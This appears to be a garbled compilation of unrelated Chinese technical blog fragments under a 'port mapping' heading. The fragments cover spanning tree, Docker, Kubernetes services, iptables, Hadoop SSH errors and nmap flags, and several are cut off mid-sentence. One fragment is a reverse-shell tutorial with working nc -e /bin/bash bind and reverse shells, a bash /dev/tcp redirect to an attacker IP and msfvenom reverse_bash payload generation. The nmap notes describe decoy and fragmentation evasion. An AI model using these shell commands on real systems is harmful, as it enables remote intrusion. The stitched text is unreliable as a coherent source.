映射端口

生成树技术 一、生成树协议简介 为了提高网络可靠性，交换网络中通常会使用冗余链路来解决单点故障问题，但冗余链路会给交换网络带来环路风险，并导致广播风暴以及MAC地址表不稳定等问题，进而会影响到用户的通信质量。生成树协议STP（Spanning Tree Protocol）可以在提高可靠性的同时又能避免环路带来的各种问题。生成树协议主要作用有： 消除环路 通过阻断冗余链路来消除网络中可能存在的环路 链路备份 当活动路径发生故障时，激活备份链路，及时恢复网络连通性 生成树协议主要有STP（801.1d）、RSTP（802.1w）和MSTP（802.1s）三种协议。 二、STP 1. STP 基本概念 STP通过运行STA算法在交换网络中构造一棵树（无环）来消除交换网络中的环路。每个STP网络中，都存在一个根桥，其他交换机为非根桥，根桥位于整个逻辑树的根部，是STP网络的逻辑中心，非根桥是根桥的下游设备。当现有根桥发生故障时，非根桥之间会交互BPDU并重新选举根桥。 端口状态 端口状态 描述 Disable 不参与STP，不转发任何数据和BPDU Blocking 不转发数据，可接收BPDU，不发送BPDU，不学习MAC地址 Listening 不转发数据，可接收BPDU，可发送BPDU，不学习MAC地址 Learning 不转发数据，可接收BPDU，可发送BPDU，学习MAC地址

1.docker适用环境 其实docker本身也没有太多在Windows下花功夫。 目前，docker仅支持Linux与Windows企业版、专业版、教育版。ps：家庭版不支持docker ,并且win10下可以安装 docker-for-windows ,这个安装包是 专门适用于win10，安装简单，而对于win7/8则可以使用 Docker Toolbox下载地址 2.Windows下无法对docker容器进行端口访问（端口映射的问题） 1.问题详情 在Windows10系统服务器中安装了docker和docker-compose 并尝试在其中运行Nginx服务，映射也做好 问题：在主机的浏览器中，打开localhost:port无法访问对应的Web服务。 2.问题解析 原因：docker是运行在Linux上的，在Windows中运行docker，实际上还是在Windows下先安装了一个Linux环境，然后在这个系统中运行的docker。也就是说，服务中使用的localhost指的是这个Linux环境的地址，而不是我们的宿主环境Windows10。 3.解决办法 启动docker命令行窗口 输入命令:docker-machine ip default Linux的ip地址，一般情况下这个地址是192.168.99.100 然后在Windows的浏览器中，输入 http://IP

service的三种工作模式： (userstats(效率低)、iptables、ipvs) service可以自动实现负载均衡 。 service自动实现了负载均衡，service通过selector标签选择器匹配了后面多个pod！后端多个pod提供底层服务。 Service版本介绍 userspace: 1.1之前版本 iptabls: 1.10之前版本 ipvs: 1.11之后版本 service依赖core-dns 四种 service类型: ExternalName (把外部集群服务引入到集群内部使用)、 ClusterIP ( 默认这个。仅仅用于集群内部通信 ）、 NodePort (和集群外部通信)、 LoadBalance (把k8s部署在云环境上面，云环境支持LBAS(负载均衡即服务一键调用)，创建软负载均衡器使用。自动外部触发创建一个负载均衡，例如阿里LB-service)。 资源记录 SVC_NAME.NS_NAME.DOMAIN.LTD. #提供service服务域名格式 svc.clusqter.local #集群的默认名字域名 redis.default.svc.clustel.local. #每一个服务生产的域名格式，默认格式 Service用标签selector和后端pod建立关系,所以pod要先跑起来。 0、 kube

大年初一，当然是更一篇重磅文章啦 反弹shell /bin目录下带sh的都是shell nc 1.正向连接，目标机监听自身端口，攻击机主动建立连接 目标机：nc -lvvp 端口 -e /bin/bash (-e cmd.exe) 攻击机：nc -vv 目标IP 监听端口 适用情况：目标机有独立外网ip，攻击机有无都行 2.反向连接，攻击机监听自身端口，目标机主动建立连接 攻击机：nc -lvvp 端口 目标机：nc -vv 攻击机ip 端口 -e /bin/bash 适用情况：攻击机有独立外网ip，目标机在内网，只有一个或多个映射端口 3.聊天/传文件 攻击机：nc -lvvp 端口 < 文件 目标机：nc -vv 攻击机IP 攻击机端口 > 文件 注意：有防火墙会连不上，得找放过的端口 bash 攻击机监听：nc -lvvp 端口 目标机：bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1 把bash重定向 使用kali下msfvenom生成payload msfvenom -l payloads | grep bash #搜索payload制作命令 msfvenom -p cmd/unix/reverse_bash LHOST=攻击机IP LPORT=攻击机端口 #制作payload 目标机运行payload：0<&209-;exec 209<>/dev

系统重要的目录及文件 1.启动目录：在此文件夹下的程序会开机自启；（Startup); 2.windows--System32(系统配置目录不要乱改）--config--SAM 此文件保存系统账号密码 3.windows--System--drivers--etc--hosts 此文件用来解析域名 服务 服务是一种应用程序类型，他在后台运行，服务应用类型可以为用户提供一些功能 通过端口来区分服务 服务的开启方式 1.右击我的电脑--管理 2.运行--services.mac 常见的服务 1.web服务，也就是网站服务 2.dns服务，为计算机解析ip 3.dhcp服务，为用户分发ip 4.邮件服务 5.telnet服务，建立远程连接的 6.ssh服务，加密建立远程连接 7.ftp服务，文件的上传下载 8.smb服务，文件共享 端口 用来区分不同的服务的去，计算机一共有65535个端口 类型 共有端口 注册端口 私有端口 注册表 存放系统重要的参数，是系统的核心数据库 如何打开一个注册表 进入运行后输入regedit 注册表的用处 第一行是管理文件系统 第二行是管理当前用户信息（主要） 第三行是管理硬件配置（主要） 第四行是管理用户信息 第五行是管理当前用户系统配置 --可利用注册表防病毒 dos命令（重要） color 改变cmd窗口的颜色 ping

错误提示如下： 　　我在第一次搭建自己的 hadoop2.2.0单节点的伪分布集成环境时遇到了此错误，通过思考问题和查找解决方案最终搞定了这个问题，其错误原因主要有以下几种： 　　1）SSH服务为安装 　　　　此时，采用在线安装的方式就行下载安装，命令为：yum -y install openssh-server；然后启动ssh服务：service sshd start。 　　2）ssh服务对应22号端口未开启 　　　　首先使用命令：ss -lnt查询22号端口是否开启，如下图所示为正常开启，否则要开启22号端口。 如果要修改端口，查看或编辑SSH服务配置文件，使用命令 vi /etc/ssh/sshd.config，进入后把 port 后面默认的22端口改成别的端口即可（注意前面的#号要去掉）。 　　3）还有一种特殊情况：以上两点都没有问题，并且执行ssh localhost命令也没有问题，但执行ssh hostname（hostname为你自己的主机名）命令时出错 　　　　此时，我们可以思考为什么用localhost没有问题，而用我们的主机名却有问题？注意看下图第一行配置，有个127.0.0.1到localhost的映射；于是，我们可以思考是否是因为我们没有配置IP地址到我们的主机的映射呢。其实，出现这种情况就是因为我们没有在hosts文件中进行相应的配置

第1章 简介 与管理程序虚拟化（hypervisor virtualization）的区别： 管理程序虚拟化：通过中间层将一台或多台独立的机器虚拟运行于物理硬件之上 容器：直接运行在操作系统内核之上的用户空间 得益于现代Linux的内核特性（如control group、namespace），容器与宿主机之间的隔离更彻底，可以拥有独立的网络和存储栈，以及资源管理能力。 直接使用操作系统的系统调用接口。 推荐单个容器只运行一个应用程序或进程，使得形成一个分布式的应用程序模型，促使部署、扩展或调试应用程序都变得简单。 Docker核心组件 Docker客户端和服务器，也称为Docker引擎 Docker镜像 Registry Docker容器 镜像是Docker生命周期中的构建或打包阶段，而容器是启动或执行阶段。 定义 一个命令行程序、一个后台守护进程、一组远程服务 第2章 安装 使用脚本安装 curl https://get.docker.com/ | sh 升级Docker apt-get update apt-get install docker-engine Linux内核版本查看: cat /proc/version 或 uname -a docker log路径 /var/log/docker.log 升级Linux内核 aptitude search linux

一．iptables简介 防火墙，其实说白了讲，就是用于实现Linux下访问控制功能的，它分为硬件的或者软件的防火墙两种。无论是在哪个网络中，防火墙工作的地方一定是在网络的边缘。而我们的任务就是需要去定义到底防火墙如何工作，这就是防火墙的策略，规则，以达到让它对出入网络的IP、数据进行检测，它的功能十分强大，使用非常灵活，毫不逊色于一些企业级防火墙。 二．Netfilter、table、chains、policy之间的关系。 Netfilter是table的容器，而table（表）是chains（链）的容器，policy（规则）属于chain（链）。 为了方便读者理解，举个例子：如果把Netfilter比作一栋楼，那么他们的关系如下： 三．iptables的工作原理 匹配规则原理图 防火墙规则的执顺序默认是从前到后，遇到匹配规则（不管是deny或者accept）后就不再往下检查，如果遇到不到匹配的规则会继续向下检查直到遇到匹配规则为止，若检查完所有规则还没有匹配就会使用默认规则进行匹配。 iptable表和链的对应关系 防火墙默认使用的是Fileter表，负责过滤本机流入、流出的数据包 INPUT：负责过滤所有目标地址是本机地址的数据包 FORWARD：负责转发流经本机但不进入本机的数据包，起转发的作用 OUTPUT：处理所有从本机发出去的数据包。 PROWARD

日期：2019-07-03 21:23:39 更新： 作者：Bay0net 介绍：汇总一下笔记里面的 nmap 使用方式 0x01、 基本信息 Nmap: the Network Mapper - Free Security Scanner Download the Free Nmap Security Scanner for Linux/Mac/Windows 0x02、使用说明 2.1 参数介绍 -iL：扫描文件 -V：输出版本信息 -O：操作系统探测 -R：总是使用域名解析 -f：分片扫描，挺好用 -A：同时输出-O和-sV 的信息 -D：可以指定几个假的 IP，来扫描 -n：不使用域名解析，可以加快速度。 -sV：版本探测 -sS：SYN 扫描 -sT：TCP 扫描 -sU：UDP 扫描 -sF：FIN 扫描 -sP：ping scan -sn: 跳过端口扫描 -P0：不 ping，直接扫描，【默认主机是存活的】 -F：默认扫描 1000 个端口，使用 -F 只扫描 100 个 -oN：输出为普通文件 -oX：输出为 xml 文件  欺骗的艺术 -f; --mtu value---------------- 指定使用分片、指定数据包的 MTU -D decoy1,decoy2,ME------------ 使用诱饵隐蔽扫描 -S IP-ADDRESS-----------

docker镜像的分层  Dockerfile 中的每个指令都会创建一个新的镜像层；  镜像层将会被缓存和复用；  当 Dockerfile 的指令修改了，复制的文件变化了，或者构建镜像时指定的变量不同了，对应的镜像层缓存就会失效；  某一层的镜像缓存失效之后，它之后的镜像层缓存都会失效；  镜像层是不变的，如果在某一层中添加一个文件，然后在下一层中删除它，则镜像中依然包含该文件 docker镜像 是应用发布的标准格式 可支撑一个docker容器的运行 docker镜像的创建方法 基于已有镜像创建 基于本地模板创建 基于dockerfile创建 基于已有镜像创建 将容器里面运行的程序及运行环境打包生成新的镜像 docker commit [选项] 容器ID/名称 仓库名称:[标签] -m：说明信息 -a：作者信息 -p：生成过程中停止容器的运行 基于本地模板创建 通过导入操作系统模板文件生成新的镜像 使用wget命令导入为本地镜像 导入成功后可查看本地镜像信息 基于 Dockerfile 创建 Dockerfile 是由一组指令组成的文件 Dockerfile 结构的四部分： 基础镜像信息； 维护者信息； 镜像操作指令； 容器启动时执行指令； 使用 Dockerfile 创建镜像并在容器中运行 dockerfile操作指令 指令 含义 FROM 镜像 指定新镜像所基于的镜像